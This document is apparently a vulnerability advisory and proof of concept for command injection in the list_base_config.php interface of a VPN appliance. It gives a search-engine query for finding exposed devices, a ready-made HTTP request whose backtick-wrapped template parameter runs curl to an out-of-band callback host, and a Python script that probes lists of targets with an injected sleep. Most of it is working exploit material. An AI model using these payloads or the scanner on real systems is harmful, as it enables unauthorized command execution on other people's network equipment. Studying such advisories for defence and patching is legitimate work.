》》》Vulnerability Description《《《
Network devices are the hardware that keeps a computer network running: routers, switches, bridges, network cards, hubs, firewalls, modems, wireless access points, and so on. Routers forward traffic between networks and perform address translation; switches interconnect devices within a LAN and exchange data; bridges link different network segments; network cards provide wired or wireless interfaces; firewalls monitor and control traffic to protect the network. The 某某康达 VPN has a command-execution vulnerability in its list_base_config.php interface: an attacker can inject shell commands through it and gain system privileges.
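The root cause is the classic command-substitution pattern: a request parameter is concatenated into a shell command line, so a backtick-wrapped value gets executed by the shell. A minimal Python sketch of that vulnerable pattern (the variable names and the `echo` command are hypothetical, for illustration only; assumes a POSIX shell):

```python
import subprocess

# Hypothetical reconstruction of the vulnerable pattern: attacker-controlled
# input is concatenated into a shell command, so backtick command
# substitution is evaluated before the outer command runs.
user_input = "`echo INJECTED`"          # attacker-controlled 'template' value
result = subprocess.run(f"echo {user_input}", shell=True,
                        capture_output=True, text=True)
print(result.stdout.strip())            # the inner command ran: INJECTED
```

The fix on the server side is to never pass user input through a shell: invoke the target program with an argument list (no `shell=True` equivalent), or strictly validate the parameter.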
》》》Asset Discovery《《《
1) Information gathering
fofa:body="/images/raisecom/back.gif"
》》》Reproduction《《《
1. Obtain a callback domain from DNSLog.cn (or a similar out-of-band platform).
2. Craft the request: the backtick-wrapped value of the template parameter is executed as a shell command, here a curl request to the callback domain:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
3. The out-of-band platform logs the incoming request, confirming command execution and revealing the server's IP address.
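The %60 sequences in the request above are URL-encoded backticks; the encoded template value can be reproduced with `urllib.parse.quote`:

```python
from urllib.parse import quote

# Backtick-wrapped curl payload from the request above
payload = "`curl 1111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com`"
encoded = quote(payload)  # backtick -> %60, space -> %20
print(encoded)
# %60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60
```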
》》》Testing Tool《《《
import argparse
import ssl

import requests
import urllib3

# Disable SSL certificate verification and suppress the resulting warnings
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def read_file(file_path):
    """Read a list of target URLs from a file, one URL per line."""
    with open(file_path, 'r') as file:
        return file.read().splitlines()


def check(url):
    """
    Check whether the target's list_base_config.php is vulnerable to
    command injection, using a time-based probe: a backtick-wrapped
    `sleep 5` is injected via the template parameter and the response
    delay is measured (this assumes `sleep` exists on the target).
    :param url: target base URL
    :return: True if the vulnerability appears to be present
    """
    url = url.rstrip("/")
    # %60 is the URL-encoded backtick; the payload sleeps for 5 seconds
    target = url + "/vpn/list_base_config.php?type=mod&parts=base_config&template=%60sleep%205%60"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
    }
    try:
        response = requests.get(target, verify=False, headers=headers, timeout=25)
        # The injected sleep should add roughly 5 seconds to the response time
        if response.status_code == 200 and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered: {url}: list_base_config.php command injection!\033[0m")
            return True
    except requests.RequestException:
        pass
    return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="single target URL")
    parser.add_argument("-f", "--txt", help="file of target URLs, one per line")
    args = parser.parse_args()
    if args.url:
        check(args.url)
    elif args.txt:
        for url in read_file(args.txt):
            check(url)
    else:
        parser.print_help()